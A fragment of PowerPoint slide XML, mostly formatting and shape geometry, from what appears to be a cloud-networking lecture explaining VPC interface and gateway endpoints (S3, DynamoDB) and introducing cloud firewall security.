              <a:rPr dirty="0" sz="2000" spc="-5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dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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dirty="0" sz="20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000" spc="-15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000" spc="-3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000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>oi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55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000" spc="-4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0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8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000" spc="-2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000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>terface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42252" y="306451"/>
            <a:ext cx="25704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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPC</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Endpoints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00215" y="760476"/>
            <a:ext cx="3707891" cy="3657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913382" y="1882292"/>
            <a:ext cx="12828270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12314" marR="5080" indent="-2000250">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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VPC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endpoints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simply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refers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publishing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service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over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cloud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internal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network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helps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avoid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exposing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traffic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Internet.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two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types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VPC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endpoints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are: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66644" y="3299459"/>
            <a:ext cx="4099560" cy="981710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4099559" h="981710">
                <a:moveTo>
                  <a:pt x="3935983" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="163575" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120106" y="5846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81035" y="22342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47926" y="47926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22342" y="81035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846" y="120106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="817879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846" y="861349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22342" y="900420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47926" y="933529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81035" y="959113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120106" y="975609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163575" y="981455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3935983" y="981455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979453" y="975609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4018524" y="959113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4051633" y="933529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4077217" y="900420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4093713" y="861349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4099559" y="817879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4099559" y="163575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4093713" y="120106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4077217" y="81035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4051633" y="47926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4018524" y="22342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979453" y="5846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3935983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699764" y="3595242"/>
            <a:ext cx="243395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Inte</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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face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Endpoi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678418" y="3780282"/>
            <a:ext cx="6160135" cy="4538980"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="4538980">
                <a:moveTo>
                  <a:pt x="0" y="756412"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1488" y="708580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5894" y="661539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13129" y="615376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23104" y="570180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35731" y="526040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50921" y="483045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68585" y="441282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88635" y="400841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110982" y="361811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135537" y="324280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162212" y="288336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190918" y="254069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221567" y="221567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254069" y="190918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288336" y="162212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324280" y="135537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361811" y="110982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400841" y="88635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441282" y="68585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483045" y="50921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526040" y="35731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570180" y="23104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615376" y="13129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="661539" y="5894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="708580" y="1488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756411" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5403595" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5451427" y="1488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498468" y="5894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5544631" y="13129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589827" y="23104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5633967" y="35731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676962" y="50921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5718725" y="68585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5759166" y="88635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5798196" y="110982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5835727" y="135537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871671" y="162212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5905938" y="190918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5938440" y="221567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5969089" y="254069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5997795" y="288336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6024470" y="324280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6049025" y="361811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6071372" y="400841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6091422" y="441282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6109086" y="483045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6124276" y="526040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136903" y="570180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146878" y="615376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6154113" y="661539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158519" y="708580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="756412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="3782059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158519" y="3829896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6154113" y="3876942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146878" y="3923109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136903" y="3968308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6124276" y="4012450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6109086" y="4055447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6091422" y="4097211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6071372" y="4137652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6049025" y="4176683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6024470" y="4214214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5997795" y="4250156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5969089" y="4284422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5938440" y="4316923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5905938" y="4347570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871671" y="4376274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5835727" y="4402947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5798196" y="4427501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5759166" y="4449846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5718725" y="4469894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676962" y="4487556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5633967" y="4502744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589827" y="4515370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5544631" y="4525344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498468" y="4532578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5451427" y="4536983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5403595" y="4538471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756411" y="4538471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="708580" y="4536983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="661539" y="4532578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615376" y="4525344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570180" y="4515370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526040" y="4502744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483045" y="4487556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441282" y="4469894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400841" y="4449846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361811" y="4427501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324280" y="4402947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288336" y="4376274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254069" y="4347570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221567" y="4316923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190918" y="4284422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162212" y="4250156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135537" y="4214214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110982" y="4176683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88635" y="4137652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68585" y="4097211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50921" y="4055447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35731" y="4012450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23104" y="3968308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13129" y="3923109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5894" y="3876942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1488" y="3829896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3782059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="756412"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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9028303" y="5652830"/>
            <a:ext cx="5002530" cy="14166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marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gatew</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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000" spc="-35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r>
              <a:rPr dirty="0" sz="2000" spc="-13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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25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000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>po</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-2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000" spc="-4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0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8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000" spc="-6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0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dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>se</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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0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000" spc="-35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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>co</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45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000" spc="-2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000" spc="-4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000" spc="-25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dirty="0" sz="2000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-7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000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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000" spc="-25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000" spc="-75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dirty="0" sz="2000" spc="-3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000" spc="-3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0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000" spc="-4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000" spc="-14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1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000" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="2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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>S3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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dirty="0" sz="2000" spc="-15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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Dyna</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>oDB  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-2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000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rvic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-7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000" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15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dirty="0" sz="20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7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0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75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dirty="0" sz="2000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>onfi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-9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dirty="0" sz="2000" spc="-25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dirty="0" sz="2000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>re</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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0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000" spc="-3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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rout</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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000" spc="-13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000" spc="-4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0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000" spc="-45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dirty="0" sz="2000" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>service.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747504" y="3299459"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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0750422" y="3596386"/>
            <a:ext cx="24028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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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way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Endpoi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7871" y="306451"/>
            <a:ext cx="408051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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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91328" y="760476"/>
            <a:ext cx="5687568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989641" y="3919795"/>
            <a:ext cx="1691005" cy="4337050"/>
            <a:chOff x="5989641" y="3919795"/>
            <a:chExt cx="1691005" cy="4337050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5989641" y="3919795"/>
              <a:ext cx="1691005" cy="4337050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="94420" y="4263652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31428" y="4320942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115121" y="4337007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107451" y="4309829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94420" y="4309829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90610" y="4297701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102943" y="4293855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94420" y="4263652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="102943" y="4293855"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90610" y="4297701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94420" y="4309829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106397" y="4306093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102943" y="4293855"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="106397" y="4306093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="94420" y="4309829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107451" y="4309829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106397" y="4306093"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="209992" y="4272314"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="172017" y="4272314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102943" y="4293855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106397" y="4306093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175954" y="4284391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209992" y="4272314"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="341843" y="4220929"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="309812" y="4220929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241232" y="4247790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171763" y="4272390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172017" y="4272314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209992" y="4272314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245677" y="4259652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314511" y="4232715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341843" y="4220929"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1691004" h="4337050">
                  <a:moveTo>
                    <a:pt x="241359" y="4247714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241144" y="4247790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241359" y="4247714"/>
                  </a:lnTo>
                  <a:close/>
